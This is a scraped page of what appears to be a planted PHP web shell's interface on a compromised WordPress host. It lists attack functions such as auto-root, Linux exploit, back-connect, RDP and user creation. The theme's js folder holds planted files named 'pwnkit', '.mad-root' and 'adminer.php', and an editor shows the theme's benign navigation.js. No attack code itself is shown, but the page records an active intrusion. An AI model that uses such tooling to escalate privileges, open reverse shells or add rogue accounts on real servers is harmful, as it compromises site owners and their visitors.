Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
catch-box /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
catchbox-fitvids.js
2.71
KB
-rw-r--r--
catchbox-fitvids.min.js
1.58
KB
-rw-r--r--
catchbox-scrollup.js
393
B
-rw-r--r--
catchbox-scrollup.min.js
314
B
-rw-r--r--
catchbox_slider.js
1.2
KB
-rw-r--r--
html5.js
10.09
KB
-rw-r--r--
html5.min.js
2.58
KB
-rw-r--r--
jquery.cookie.js
3.02
KB
-rw-r--r--
jquery.cookie.min.js
1.26
KB
-rw-r--r--
jquery.cycle.all.js
50.81
KB
-rw-r--r--
jquery.cycle.all.min.js
26.54
KB
-rw-r--r--
jquery.sidr.js
16.64
KB
-rw-r--r--
jquery.sidr.min.js
7.11
KB
-rw-r--r--
navigation.js
1.45
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
skip-link-focus-fix.js
1.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : navigation.js
/** * Handles toggling the navigation menu for small screens and * accessibility for submenu items. */ ( function() { var nav = document.getElementById( 'access' ), button, menu; if ( ! nav ) { return; } button = nav.getElementsByTagName( 'button' )[0]; menu = nav.getElementsByTagName( 'ul' )[0]; if ( ! button ) { return; } // Hide button if menu is missing or empty. if ( ! menu || ! menu.childNodes.length ) { button.style.display = 'none'; return; } button.onclick = function() { if ( -1 === menu.className.indexOf( 'menu' ) ) { menu.className = 'menu'; } if ( -1 !== button.className.indexOf( 'toggled-on' ) ) { button.className = button.className.replace( ' toggled-on', '' ); menu.className = menu.className.replace( ' toggled-on', '' ); } else { button.className += ' toggled-on'; menu.className += ' toggled-on'; } }; } )(); // Better focus for hidden submenu items for accessibility. ( function( $ ) { $( '.menu-focus' ).find( 'a' ).on( 'focus.catchbox blur.catchbox', function() { $( this ).parents( '.menu-item, .page_item' ).toggleClass( 'focus' ); } ); if ( 'ontouchstart' in window ) { $( '.menu-item-has-children > a' ).on( 'touchstart.catchbox', function( e ) { var el = $( this ).parent( 'li' ); if ( ! el.hasClass( 'focus' ) ) { e.preventDefault(); el.toggleClass( 'focus' ); el.siblings( '.focus').removeClass( 'focus' ); } } ); } } )( jQuery );
Close